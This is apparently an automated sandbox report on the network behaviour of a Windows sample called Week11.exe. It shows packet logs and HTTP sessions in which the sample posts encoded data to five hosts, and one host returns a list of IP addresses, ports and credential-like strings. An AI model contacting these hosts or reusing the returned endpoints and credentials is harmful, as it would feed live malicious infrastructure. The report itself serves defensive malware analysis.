                              Nov 11, 2024 17:57:17.781618118 CET804970791.212.166.91192.168.2.5
                              Nov 11, 2024 17:57:17.801697016 CET4970880192.168.2.5188.130.206.243
                              Nov 11, 2024 17:57:17.806694031 CET8049708188.130.206.243192.168.2.5
                              Nov 11, 2024 17:57:17.806770086 CET4970880192.168.2.5188.130.206.243
                              Nov 11, 2024 17:57:17.807096958 CET4970880192.168.2.5188.130.206.243
                              Nov 11, 2024 17:57:17.812374115 CET8049708188.130.206.243192.168.2.5
                              Nov 11, 2024 17:57:17.822992086 CET4970780192.168.2.591.212.166.91
                              Nov 11, 2024 17:57:19.543759108 CET8049708188.130.206.243192.168.2.5
                              Nov 11, 2024 17:57:19.547219992 CET4970780192.168.2.591.212.166.91
                              Nov 11, 2024 17:57:19.547256947 CET4970680192.168.2.593.185.159.253
                              Nov 11, 2024 17:57:19.547266006 CET4970580192.168.2.546.8.236.61
                              Nov 11, 2024 17:57:19.547307014 CET4970480192.168.2.546.8.232.106
                              Nov 11, 2024 17:57:19.547557116 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:57:19.553570032 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:57:19.553678036 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:57:19.570066929 CET8049708188.130.206.243192.168.2.5
                              Nov 11, 2024 17:57:19.570173025 CET4970880192.168.2.5188.130.206.243
                              Nov 11, 2024 17:57:19.584469080 CET804970791.212.166.91192.168.2.5
                              Nov 11, 2024 17:57:19.584518909 CET804970693.185.159.253192.168.2.5
                              Nov 11, 2024 17:57:19.584531069 CET804970546.8.236.61192.168.2.5
                              Nov 11, 2024 17:57:19.584544897 CET804970446.8.232.106192.168.2.5
                              Nov 11, 2024 17:57:19.584578037 CET4970780192.168.2.591.212.166.91
                              Nov 11, 2024 17:57:19.584610939 CET4970680192.168.2.593.185.159.253
                              Nov 11, 2024 17:57:19.584626913 CET4970480192.168.2.546.8.232.106
                              Nov 11, 2024 17:57:19.584621906 CET4970580192.168.2.546.8.236.61
                              Nov 11, 2024 17:57:20.153842926 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:57:20.154103994 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:57:20.159159899 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:57:35.170234919 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:57:35.175311089 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:57:40.157119036 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:57:40.157536030 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:57:40.162553072 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:57:49.548648119 CET4970880192.168.2.5188.130.206.243
                              Nov 11, 2024 17:57:49.549150944 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:57:49.553416967 CET8049708188.130.206.243192.168.2.5
                              Nov 11, 2024 17:57:49.554022074 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:57:49.784385920 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:57:49.832168102 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:58:00.365731001 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:58:00.366110086 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:58:00.371018887 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:58:15.382267952 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:58:15.387249947 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:58:19.554169893 CET4970880192.168.2.5188.130.206.243
                              Nov 11, 2024 17:58:19.558973074 CET8049708188.130.206.243192.168.2.5
                              Nov 11, 2024 17:58:19.788997889 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:58:19.793848991 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:58:20.001281023 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:58:20.048991919 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:58:20.583678961 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:58:20.584033966 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:58:20.589318991 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:58:35.600986004 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:58:35.606076956 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:58:40.791482925 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:58:40.791714907 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:58:40.796587944 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:58:49.542737007 CET4970880192.168.2.5188.130.206.243
                              Nov 11, 2024 17:58:49.555527925 CET8049708188.130.206.243192.168.2.5
                              Nov 11, 2024 17:58:49.555654049 CET4970880192.168.2.5188.130.206.243
                              Nov 11, 2024 17:58:49.996901989 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:58:50.002541065 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:58:50.205581903 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:58:50.253335953 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:59:00.999234915 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:59:00.999623060 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:59:01.005156040 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:59:16.015749931 CET4970928670192.168.2.594.103.88.127
                              Nov 11, 2024 17:59:16.021071911 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:59:21.207706928 CET286704970994.103.88.127192.168.2.5
                              Nov 11, 2024 17:59:21.250046015 CET4970928670192.168.2.594.103.88.127
                              TimestampSource PortDest PortSource IPDest IP
                              Nov 11, 2024 17:57:56.589783907 CET5356272162.159.36.2192.168.2.5
                              Nov 11, 2024 17:57:57.324245930 CET53498431.1.1.1192.168.2.5
                              • 46.8.232.106
                              • 46.8.236.61
                              • 93.185.159.253
                              • 91.212.166.91
                              • 188.130.206.243
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.54970446.8.232.106802172C:\Users\user\Desktop\Week11.exe
                              TimestampBytes transferredDirectionData
                              Nov 11, 2024 17:57:14.949439049 CET334OUTPOST / HTTP/1.1
                              Host: 46.8.232.106
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: IvkcbsG4
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 11, 2024 17:57:15.630495071 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Mon, 11 Nov 2024 16:57:15 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.54970546.8.236.61802172C:\Users\user\Desktop\Week11.exe
                              TimestampBytes transferredDirectionData
                              Nov 11, 2024 17:57:15.661811113 CET333OUTPOST / HTTP/1.1
                              Host: 46.8.236.61
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: h1Vcw1Hj
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 11, 2024 17:57:16.317673922 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Mon, 11 Nov 2024 16:57:16 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.54970693.185.159.253802172C:\Users\user\Desktop\Week11.exe
                              TimestampBytes transferredDirectionData
                              Nov 11, 2024 17:57:16.382776976 CET336OUTPOST / HTTP/1.1
                              Host: 93.185.159.253
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: nR253E4s
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 11, 2024 17:57:17.074347019 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Mon, 11 Nov 2024 16:57:16 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.54970791.212.166.91802172C:\Users\user\Desktop\Week11.exe
                              TimestampBytes transferredDirectionData
                              Nov 11, 2024 17:57:17.102101088 CET335OUTPOST / HTTP/1.1
                              Host: 91.212.166.91
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: SgIe3D6e
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 11, 2024 17:57:17.781618118 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Mon, 11 Nov 2024 16:57:17 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.549708188.130.206.243802172C:\Users\user\Desktop\Week11.exe
                              TimestampBytes transferredDirectionData
                              Nov 11, 2024 17:57:17.807096958 CET337OUTPOST / HTTP/1.1
                              Host: 188.130.206.243
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: foR5Iaks
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 11, 2024 17:57:19.543759108 CET554INHTTP/1.1 200 OK
                              Date: Mon, 11 Nov 2024 16:57:19 GMT
                              Content-Length: 436
                              Content-Type: text/plain; charset=utf-8
                              Data Raw: 39 34 2e 31 30 33 2e 38 38 2e 31 32 37 3b 32 38 36 37 30 3b 68 4e 35 4b 74 5a 74 69 74 42 4b 64 70 44 33 74 3a 33 59 50 2f 52 72 30 2f 7a 57 37 34 39 46 33 36 32 6d 56 2e 68 4b 79 38 43 6c 38 2e 48 32 70 32 4a 43 76 33 55 65 6d 32 35 58 58 2e 42 71 64 31 70 63 47 30 54 76 43 36 39 74 4e 2c 44 75 36 68 66 73 56 74 6d 47 58 74 50 30 50 70 7a 52 7a 3a 50 55 61 2f 64 53 4d 2f 39 30 79 34 64 32 70 36 43 62 42 2e 68 36 59 38 32 42 4b 2e 37 35 47 32 44 76 42 33 47 37 57 36 71 35 31 2e 6d 76 58 36 72 73 34 31 53 6c 67 2c 4e 33 6e 68 39 74 5a 74 44 6f 45 74 71 6f 49 70 6f 67 67 3a 45 6d 74 2f 76 31 38 2f 55 31 47 39 37 57 57 33 6b 70 70 2e 39 77 47 31 33 4f 35 38 36 58 47 35 4a 39 78 2e 37 54 57 31 61 35 43 35 34 4c 4c 39 36 45 74 2e 63 34 57 32 53 38 61 35 7a 39 7a 33 62 67 5a 2c 33 61 67 68 56 6b 35 74 4d 6c 4e 74 6f 5a 36 70 38 63 6e 3a 37 76 51 2f 4f 78 61 2f 78 6a 4c 39 6f 59 45 31 38 57 4c 2e 4c 51 50 32 52 53 75 31 58 35 52 32 62 52 63 2e 31 66 58 31 5a 74 49 36 68 37 41 36 37 6c 49 2e 56 6e 73 39 32 [TRUNCATED]
                              Data Ascii: 94.103.88.127;28670;hN5KtZtitBKdpD3t:3YP/Rr0/zW749F362mV.hKy8Cl8.H2p2JCv3Uem25XX.Bqd1pcG0TvC69tN,Du6hfsVtmGXtP0PpzRz:PUa/dSM/90y4d2p6CbB.h6Y82BK.75G2DvB3G7W6q51.mvX6rs41Slg,N3nh9tZtDoEtqoIpogg:Emt/v18/U1G97WW3kpp.9wG13O586XG5J9x.7TW1a5C54LL96Et.c4W2S8a5z9z3bgZ,3aghVk5tMlNtoZ6p8cn:7vQ/Oxa/xjL9oYE18WL.LQP2RSu1X5R2bRc.1fX1ZtI6h7A67lI.Vns927W1j56,wC8hKvWtHSXtav0pYPO:lsj/2YB/tAG1YeK8YCy8XLE.wOb142r3F9O05Gq.7bA2Bdy0FWU6PnN.PMI2x9d46dY3o0O
                              Nov 11, 2024 17:57:19.570066929 CET554INHTTP/1.1 200 OK
                              Date: Mon, 11 Nov 2024 16:57:19 GMT
                              Content-Length: 436
                              Content-Type: text/plain; charset=utf-8
                              Data Raw: 39 34 2e 31 30 33 2e 38 38 2e 31 32 37 3b 32 38 36 37 30 3b 68 4e 35 4b 74 5a 74 69 74 42 4b 64 70 44 33 74 3a 33 59 50 2f 52 72 30 2f 7a 57 37 34 39 46 33 36 32 6d 56 2e 68 4b 79 38 43 6c 38 2e 48 32 70 32 4a 43 76 33 55 65 6d 32 35 58 58 2e 42 71 64 31 70 63 47 30 54 76 43 36 39 74 4e 2c 44 75 36 68 66 73 56 74 6d 47 58 74 50 30 50 70 7a 52 7a 3a 50 55 61 2f 64 53 4d 2f 39 30 79 34 64 32 70 36 43 62 42 2e 68 36 59 38 32 42 4b 2e 37 35 47 32 44 76 42 33 47 37 57 36 71 35 31 2e 6d 76 58 36 72 73 34 31 53 6c 67 2c 4e 33 6e 68 39 74 5a 74 44 6f 45 74 71 6f 49 70 6f 67 67 3a 45 6d 74 2f 76 31 38 2f 55 31 47 39 37 57 57 33 6b 70 70 2e 39 77 47 31 33 4f 35 38 36 58 47 35 4a 39 78 2e 37 54 57 31 61 35 43 35 34 4c 4c 39 36 45 74 2e 63 34 57 32 53 38 61 35 7a 39 7a 33 62 67 5a 2c 33 61 67 68 56 6b 35 74 4d 6c 4e 74 6f 5a 36 70 38 63 6e 3a 37 76 51 2f 4f 78 61 2f 78 6a 4c 39 6f 59 45 31 38 57 4c 2e 4c 51 50 32 52 53 75 31 58 35 52 32 62 52 63 2e 31 66 58 31 5a 74 49 36 68 37 41 36 37 6c 49 2e 56 6e 73 39 32 [TRUNCATED]
                              Data Ascii: 94.103.88.127;28670;hN5KtZtitBKdpD3t:3YP/Rr0/zW749F362mV.hKy8Cl8.H2p2JCv3Uem25XX.Bqd1pcG0TvC69tN,Du6hfsVtmGXtP0PpzRz:PUa/dSM/90y4d2p6CbB.h6Y82BK.75G2DvB3G7W6q51.mvX6rs41Slg,N3nh9tZtDoEtqoIpogg:Emt/v18/U1G97WW3kpp.9wG13O586XG5J9x.7TW1a5C54LL96Et.c4W2S8a5z9z3bgZ,3aghVk5tMlNtoZ6p8cn:7vQ/Oxa/xjL9oYE18WL.LQP2RSu1X5R2bRc.1fX1ZtI6h7A67lI.Vns927W1j56,wC8hKvWtHSXtav0pYPO:lsj/2YB/tAG1YeK8YCy8XLE.wOb142r3F9O05Gq.7bA2Bdy0FWU6PnN.PMI2x9d46dY3o0O
                              Nov 11, 2024 17:57:49.548648119 CET6OUTData Raw: 00
                              Data Ascii:
                              Nov 11, 2024 17:58:19.554169893 CET6OUTData Raw: 00
                              Data Ascii:


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Target ID:0
                              Start time:11:57:13
                              Start date:11/11/2024
                              Path:C:\Users\user\Desktop\Week11.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Week11.exe"
                              Imagebase:0x400000
                              File size:8'848'896 bytes
                              MD5 hash:4FBC4F26E90324C3B535943452460761
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              No disassembly